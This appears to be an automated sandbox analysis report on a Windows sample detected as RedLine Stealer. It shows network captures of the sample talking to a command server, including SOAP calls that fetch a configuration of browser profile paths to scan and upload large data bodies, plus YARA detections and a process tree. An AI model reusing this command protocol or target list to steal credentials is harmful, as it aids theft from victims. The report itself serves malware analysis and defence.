Mar 7, 2025 21:38:58.269618988 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269629955 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269699097 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269711018 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269718885 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269732952 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269752026 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269763947 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269838095 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269845963 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269946098 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269958019 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269968987 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269984961 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.269996881 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270018101 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270086050 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270096064 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270165920 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270178080 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270256996 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270268917 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270306110 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270320892 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270387888 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270400047 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270426989 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270437956 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270500898 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270510912 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270531893 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270651102 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270662069 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270672083 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270716906 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270729065 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270747900 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270759106 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270797968 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270818949 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270879984 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270891905 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270957947 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.270971060 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271008015 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271019936 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271104097 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271116018 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271128893 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271214962 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271223068 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271225929 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271339893 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271352053 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271363974 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271375895 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271387100 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271398067 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.271410942 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.312242985 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.433814049 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:58.485553980 CET	49722	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:59.284234047 CET	55615	49722	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:59.304656982 CET	49722	55615	192.168.2.4	45.137.22.249

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 21:38:50.202104092 CET	56051	53	192.168.2.4	1.1.1.1
Mar 7, 2025 21:38:50.209319115 CET	53	56051	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 21:38:50.202104092 CET	192.168.2.4	1.1.1.1	0x96d3	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 21:38:50.209319115 CET	1.1.1.1	192.168.2.4	0x96d3	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 7, 2025 21:38:50.209319115 CET	1.1.1.1	192.168.2.4	0x96d3	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.13.31	A (IP address)	IN (0x0001)	false
Mar 7, 2025 21:38:50.209319115 CET	1.1.1.1	192.168.2.4	0x96d3	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.12.31	A (IP address)	IN (0x0001)	false
Mar 7, 2025 21:38:50.209319115 CET	1.1.1.1	192.168.2.4	0x96d3	No error (0)	api.ip.sb.cdn.cloudflare.net		172.67.75.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ip.sb

45.137.22.249:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49717	45.137.22.249	55615	7796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 21:38:43.785911083 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.249:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Mar 7, 2025 21:38:44.285007000 CET	25	IN	HTTP/1.1 100 Continue
Mar 7, 2025 21:38:44.599610090 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 07 Mar 2025 20:38:44 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Mar 7, 2025 21:38:44.640104055 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 07 Mar 2025 20:38:44 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Mar 7, 2025 21:38:49.743628025 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.249:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Mar 7, 2025 21:38:49.917301893 CET	25	IN	HTTP/1.1 100 Continue
Mar 7, 2025 21:38:50.121308088 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 07 Mar 2025 20:38:50 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49721	45.137.22.249	55615	7796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 21:38:56.182990074 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.249:55615 Content-Length: 921956 Expect: 100-continue Accept-Encoding: gzip, deflate
Mar 7, 2025 21:38:57.770879984 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 07 Mar 2025 20:38:57 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49722	45.137.22.249	55615	7796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 21:38:57.781117916 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.249:55615 Content-Length: 921948 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Mar 7, 2025 21:38:58.433814049 CET	25	IN	HTTP/1.1 100 Continue
Mar 7, 2025 21:38:59.284234047 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 07 Mar 2025 20:38:59 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49720	104.26.13.31	443	7796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:38:53 UTC	64	OUT	GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive
2025-03-07 20:38:54 UTC	954	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 20:38:53 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0kLk7qr%2BBIDuv5wbwQo0D%2FugjKvGPjqFan5JxhkPP7AAB%2BdsIaug7hRh14jAB4v4HucW92A4kUo9xRThmlz%2F5NxPB2IDb7is4rq%2BI%2Be45IbxvQevWplsN%2BsYhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 91cce627cf45f7d9-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=222374&min_rtt=18244&rtt_var=359157&sent=8&recv=10&lost=0&retrans=3&sent_bytes=7054&recv_bytes=678&delivery_rate=3248&cwnd=227&unsent_bytes=0&cid=3858ea818f50008c&ts=2054&x=0"
2025-03-07 20:38:54 UTC	390	IN	Data Raw: 31 37 66 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 6f 78 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 37 2e 30 33 37 39 2c 22 63 69 74 79 22 3a 22 50 6f 77 61 79 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 69 73 70 22 3a 22 43 6f 78 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 66 66 73 65 74 22 3a 2d 32 38 38 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 61 73 6e 22 3a 32 32 37 37 33 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 4e 2d 43 58 41 2d 41 4c 4c 2d 43 43 49 2d 32 32 37 37 33 2d 52 44 43 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 Data Ascii: 17f{"organization":"Cox Communications","longitude":-117.0379,"city":"Poway","timezone":"America\/Los_Angeles","isp":"Cox Communications","offset":-28800,"region":"California","asn":22773,"asn_organization":"ASN-CXA-ALL-CCI-22773-RDC","country":"United
2025-03-07 20:38:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:38:33
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\Z6ojPnRBp1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Z6ojPnRBp1.exe"
Imagebase:	0x2f0000
File size:	606'208 bytes
MD5 hash:	B92FBFB1456FFBBDA1A668CBA58533A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:38:37
Start date:	07/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x900000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:38:38
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Z6ojPnRBp1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Z6ojPnRBp1.exe.log

C:\Users\user\AppData\Local\Temp\tmp339D.tmp

C:\Users\user\AppData\Local\Temp\tmp339E.tmp

C:\Users\user\AppData\Local\Temp\tmp33AF.tmp

C:\Users\user\AppData\Local\Temp\tmp33C0.tmp

C:\Users\user\AppData\Local\Temp\tmp33C1.tmp

C:\Users\user\AppData\Local\Temp\tmp33D1.tmp

C:\Users\user\AppData\Local\Temp\tmp33E2.tmp

C:\Users\user\AppData\Local\Temp\tmp33E3.tmp

C:\Users\user\AppData\Local\Temp\tmp42A0.tmp

C:\Users\user\AppData\Local\Temp\tmp42B1.tmp

C:\Users\user\AppData\Local\Temp\tmp42E1.tmp

C:\Users\user\AppData\Local\Temp\tmp6A94.tmp

C:\Users\user\AppData\Local\Temp\tmp6AB4.tmp

C:\Users\user\AppData\Local\Temp\tmp6AC5.tmp

Windows Analysis Report
Z6ojPnRBp1.exe